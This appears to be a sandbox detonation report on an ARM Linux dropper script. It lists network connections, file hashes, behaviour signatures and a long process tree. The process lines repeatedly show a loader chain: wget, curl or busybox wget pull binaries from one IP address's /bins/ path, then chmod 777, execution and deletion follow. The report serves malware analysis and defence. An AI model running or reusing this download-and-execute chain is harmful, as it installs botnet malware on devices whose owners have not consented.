[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/chmod
[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/rm
[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 89.187.167.9:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 03:39
Reported
2024-11-20 03:43
Platform
debian9-armhf-20240611-en
Max time kernel
54s
Max time network
96s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | N/A |
| N/A | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | N/A |
| N/A | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | N/A |
| N/A | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | N/A |
| N/A | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | N/A |
| N/A | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | N/A |
| N/A | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | N/A |
| N/A | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | N/A |
| N/A | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | N/A |
| N/A | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | N/A |
| N/A | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | N/A |
| N/A | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | N/A |
| N/A | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | N/A |
| N/A | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | N/A |
| N/A | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | N/A |
| N/A | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | N/A |
| N/A | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | N/A |
| N/A | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /usr/bin/curl | N/A |
Processes
/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh
[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/chmod
[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/rm
[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/wget
[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/chmod
[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/rm
[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/wget
[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/chmod
[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/rm
[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/wget
[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/chmod
[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/rm
[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/wget
[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/chmod
[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/rm
[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/wget
[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/chmod
[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/rm
[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/wget
[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/chmod
[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/rm
[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/wget
[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/chmod
[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/rm
[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/usr/bin/wget
[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/chmod
[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/rm
[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/usr/bin/wget
[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/chmod
[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/rm
[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/usr/bin/wget
[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/chmod
[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/rm
[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/wget
[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/chmod
[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/rm
[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/wget
[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/chmod
[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/rm
[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/wget
[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/chmod
[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/rm
[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/wget
[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/chmod
[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/rm
[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/wget
[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/chmod
[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/rm
[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/wget
[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/chmod
[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/rm
[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/wget
[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/chmod
[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
